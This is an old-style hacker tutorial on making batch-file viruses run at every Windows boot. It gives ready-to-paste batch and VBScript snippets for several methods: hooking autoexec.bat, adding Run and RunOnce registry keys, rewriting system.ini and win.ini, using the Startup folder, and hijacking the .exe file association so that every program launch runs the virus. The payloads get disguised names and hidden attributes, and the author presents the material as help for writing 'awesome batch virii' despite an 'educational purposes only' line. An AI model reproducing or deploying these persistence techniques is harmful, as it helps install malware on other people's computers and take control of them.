176 lines
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176 lines
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+_+_+_+_ Batch Startup Techniques ++_+_+_+_+
cOrRuPt G3n3t!x
In this tutorial I will be discussing the different methods in which you can make your batch file execute
on startup, all of the ways depicted in this tutorial work on Windows Vista! It is essential for a proper
virus to startup each time the computer is booted so it can carry out it's routines on a frequent basis.
This tutorial is not for people trying to learn batch but rather for those trying to advance in batch!!
I would also like to send a big thanks to SAD1c for some of the code i used from his tutorials!!
1)Autoexec.bat Method:
There are 2 differnt methods in autoexec.bat, we can either write the whole virus to autoexec.bat or
we can simply make a hook for autoexec.bat to call our virus. I personally prefer the hooking method, as
an oversized autoexec.bat may raise a few eyebrows, however, I shall illustrate both methods.
a)Copying whole virus to autoexec.bat (this should be put in the begining of your virus):
-----------------------------------------------[Cut Here]---------------------------------------------
attrib -r -h C:\autoexec.bat
echo.@echo off>>C:\autoexec.bat
echo.echo my virus would be here>>C:\autoexec.bat
attrib +r +h C:\autoexec.bat
-----------------------------------------------[Cut Here]---------------------------------------------
All you have to do is add your virus code lines in the lines where i put the 'echo my virus...' and
'pause' adding more lines as needed, it will then write your virus code to autoexec.bat
b)Hooking Autoexec.bat Technique (HAT):
This is my prefered method and it will copy the current batch file to C:\virus.bat and then hook
the batch file C:\virus.bat for the next startup (Should be placed at begining of Virus):
-----------------------------------------------[Cut Here]---------------------------------------------
attrib -r -h C:\autoexec.bat
copy %0 C:\WinServ.bat >nul
type C:\autoexec.bat|find "WinServ.bat">C:\autoexec.bat
echo call C:\WinServ.bat>>C:\autoexec.bat
attrib +r +h C:\autoexec.bat
-----------------------------------------------[Cut Here]---------------------------------------------
All you need to do is change the batch name from Winserv.bat to your own, what this code will do is
write a new hooking line each startup to make sure the batch only gets called up once per start up.
2)Registery Method:
This will show the various registery keys you could use to execute your batch file each run. Although
there are different registery keys doing different things, they will all - in practice - ultimately startup
your virus on each computer boot:
As I said before there are many variants; here are some:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\RunServices
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
The "RunOnce" and "RunServicesOnce" deletes the registry key after running the file,
but this isn't a problem, because the batch file will be executed again, so it will add
the key. Now they all work on the same principle when adding the keys to the registery so
i shall now show you two keys the first is '-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
This will then add a registery key in HKLM startup called 'WinBoot' and the path of the virus will be C:\virus.bat:
-----------------------------------------------[Cut Here]---------------------------------------------
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d C:\virus.bat
-----------------------------------------------[Cut Here]---------------------------------------------
The name of the startup key and the location of the virus can be changed at will.
Next i will show the registery ADD key for HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
It works on the same principle except because we are dealling with HKEY_CURRENT_USER instead of HKEY_LOCAL_MACHINE
we then write 'REG ADD HKCU...." See below:
-----------------------------------------------[Cut Here]---------------------------------------------
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d C:\virus.bat
-----------------------------------------------[Cut Here]---------------------------------------------
3)System.ini Method:
This method will make System.ini call your batch file up each startup, we cannot just write to the system.ini
as it will then delete whatever else was in their so instead we write a seperate file in %tmp% then
type it in to the sytem.ini pretty simple i'd say:
----------------------------------------------[Cut Here]---------------------------------------------
copy %0 %windir%\WinDebug.bat
find /v /i "[boot]"<%WiNDir%\system.ini>temp1.tmp
find /v /i "shell=explorer.exe"<temp1.tmp>temp2.tmp
echo [boot]>%wIndIR%\system.ini
echo Shell=Explorer.exe WinDebug.bat>>%wiNdIR%\system.ini
type temp2.tmp>>%WIndIR%\system.ini
del temp?.tmp
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4)Win.ini Method:
We shall now do the same for win.ini; write to a temporary then type it into win.ini, see below:
-----------------------------------------------[Cut Here]---------------------------------------------
copy %0 %windir%\TaskLoad.bat.
find /v /i "[windows]"<%windir%\win.ini>temp1.tmp
find /v /i "load="<temp1.tmp>temp2.tmp
find /v /i "run="<temp2.tmp>temp1.tmp
find /v /i "NullPort="<temp1.tmp>temp2.tmp
echo [windows]>%wiNdIR%\win.ini
echo load=TaskLoad.bat>>%winDIr%\win.ini
echo run=>>%wINDir%\win.ini
echo NullPort=None>>%windIr%\win.ini
type temp2.tmp>>%wiNDir%\win.ini
del temp?.tmp
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5)Startup Folder Method:
We will now look at the simplest and not very effective method as most computer literate people will look here
for any application that starts up, but still effective, however, i could not get it to write to windows
Vista startup folder, i have done it before but for the life of me i cannot remember the technique i used
so for now this method will only work on XP:
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Copy %0 C:\WinBoot.bat
copy C:\WinBoot.bat "%UserProfile%\Start Menu\Programs\Startup\"
-----------------------------------------------[Cut Here]---------------------------------------------
6)Shell Spawning:
Shell spawning was first seen in SAD1c's BOM batch generator, what it does is associate our batch file
with the extension of an .exe or anything else we give it, so each time an .exe is opened, it will then
instead open our batch file and the .exe wont be opened, a very good way to keep our batch in memory.
I tried out SAD1c's Shell spawn and it did not gel to well with my windows vista, so instead i made my
own; similar but alot smaller and less complex:
-----------------------------------------------[Cut Here]---------------------------------------------
copy %0 C:\WinBat.bat
echo.on error resume next>temp.vbs
echo set sh=createobject("wscript.shell")>>temp.vbs
echo sh.regwrite "HKCR\exefile\Shell\Open\Command\","wscript.exe C:\CmdLoad.vbs ""%%1 %%*""">>temp.vbs
cscript temp.vbs
del temp.vbs
echo.set shell = createobject("wscript.shell")>>C:\CmdLoad.vbs
echo.shell.run "C:\WinBat.bat">>C:\CmdLoad.vbs
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It is important to take into account, that alot of .exe's will be executed therefore your batch will
untechnically have residency, so if your batch is set to send over p2p etc and it is contionusly executed
this could slow down systems even to a halt!! We therefore should make parameters, and if they are
met then only is the batch routine executed.
Thanks alot for taking your time to read this, i hope it will help you with further ventures into more awesome
batch virii. Please contact me for any queries, problems etc. REMEMBER THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY!!
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